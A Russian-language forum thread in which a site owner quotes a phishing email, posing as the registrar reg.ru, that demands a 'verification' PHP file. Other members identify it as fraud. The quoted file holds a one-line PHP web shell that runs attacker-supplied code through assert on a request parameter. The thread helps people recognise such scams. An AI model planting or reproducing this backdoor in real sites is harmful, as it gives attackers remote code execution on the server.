Единый форум поддержки

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.


Вы здесь » Единый форум поддержки » Проблемы с форумом » Не подтвердить доменное имя. Как разместить файл в корне форума?


Не подтвердить доменное имя. Как разместить файл в корне форума?

Сообщений 1 страница 6 из 6

1

Здравствуйте!
Срочно нужна Ваша помощь!
7 лет мой форум размещается на Вашей площадке, доменное имя wwwgclass-club.ru и занимает 8-е место из TOP 10 форумов QuadroBoards.
18.07 я получил уведомление от компании reg.ru, что в связи с изменениями в законодательстве, для верификации доменного имени, мне необходимо создайть в корневой директории сайта файл a1ft84q1mkxdnalb.php со следующим содержимым:

<?php
assert(stripslashes($_REQUEST[REG]));
?>

Файл должен быть создан в течение трех рабочих дней с момента получения данного уведомления и находиться на сервере до 5 августа 2017 года, 13:00 (UTC+03:00), в противном случае процедура верификации не будет пройдена.

Я сразу обратился в службу поддержки, написав письмо по адресу rusff@quadrosystems.ru, но к сожалению до сих пор не получил ответа.
Остался 1 день, подскажите пожалуйста - как мне разместить такой файл в корневой директории форума?
Заранее большое спасибо!

Отредактировано spowl (Чт, 20 Июл 2017 15:44:55)

0

2

spowl
Сделайте, пожалуйста, скриншот данного письма. И точно скопируйте почту отправителя. Глядя на строчку кода и абсурдность ситуации, могу с уверенностью сказать, это мошенники.

Добавлено спустя 2 минуты 56 секунд:

Мои догадки по поводу мошенников подтвердились, уже были похожие прецеденты, об этом можно прочитать на хабре: https://habrahabr.ru/post/265515/ [рекомендую ознакомиться]
Официальные представительства никогда не попросят для подтверждения вставить в сайт часть исполняемого кода, максимум мета-тег или загрузить текстовой файл, с содержимым из случайным наборов букв и цифр. Учитывая специфику сервиса, вам повезло, что здесь нельзя производить манипуляции с загрузкой файлов в корень форума, тем более с таким расширением.

+3

3

spowl написал(а):

18.07 я получил уведомление от компании reg.ru, что в связи с изменениями в законодательстве, для верификации доменного имени, мне необходимо создайть в корневой директории сайта файл a1ft84q1mkxdnalb.php со следующим содержимым:

Reysler написал(а):

Официальные представительства никогда не попросят для подтверждения вставить в сайт часть исполняемого кода, максимум мета-тег или загрузить текстовой файл, с содержимым из случайным наборов букв и цифр. Учитывая специфику сервиса, вам повезло, что здесь нельзя производить манипуляции с загрузкой файлов в корень форума, тем более с таким расширением.

Сам имею один домен на reg.ru - ничего такого от reg.ru мне не присылали.. Вообще в таких случаях стоит написать в техподдержку reg.ru - там отвечают достаточно быстро..

+1

4

У меня тоже ничего подобного не было.

0

5

Reysler написал(а):

spowlСделайте, пожалуйста, скриншот данного письма. И точно скопируйте почту отправителя. Глядя на строчку кода и абсурдность ситуации, могу с уверенностью сказать, это мошенники.
            Добавлено спустя 2 минуты 56 секунд:
            Мои догадки по поводу мошенников подтвердились, уже были похожие прецеденты, об этом можно прочитать на хабре: https://habrahabr.ru/post/265515/ [рекомендую ознакомиться]Официальные представительства никогда не попросят для подтверждения вставить в сайт часть исполняемого кода, максимум мета-тег или загрузить текстовой файл, с содержимым из случайным наборов букв и цифр. Учитывая специфику сервиса, вам повезло, что здесь нельзя производить манипуляции с загрузкой файлов в корень форума, тем более с таким расширением.

Большое спасибо за оперативную и качественную поддержку!
Будем внимательнее!

0

6

Maquis написал(а):

У меня тоже ничего подобного не было.
            Подпись автора Бессмертный Полк MyBB - всегда на марше

Да, спросил у знакомых кто на рег.ру имеет домены - пришло такое сообщение только мне...
Действительно жулье активничает.

kolobdur74 написал(а):

spowl написал(а):18.07 я получил уведомление от компании reg.ru, что в связи с изменениями в законодательстве, для верификации доменного имени, мне необходимо создайть в корневой директории сайта файл a1ft84q1mkxdnalb.php со следующим содержимым:Reysler написал(а):Официальные представительства никогда не попросят для подтверждения вставить в сайт часть исполняемого кода, максимум мета-тег или загрузить текстовой файл, с содержимым из случайным наборов букв и цифр. Учитывая специфику сервиса, вам повезло, что здесь нельзя производить манипуляции с загрузкой файлов в корень форума, тем более с таким расширением.Сам имею один домен на reg.ru - ничего такого от reg.ru мне не присылали.. Вообще в таких случаях стоит написать в техподдержку reg.ru - там отвечают достаточно быстро..

Честно говоря даже в голову не пришло им писать :) Ну ничего, теперь мы умнее :) за одного битого двух не битых дают :)

0


Вы здесь » Единый форум поддержки » Проблемы с форумом » Не подтвердить доменное имя. Как разместить файл в корне форума?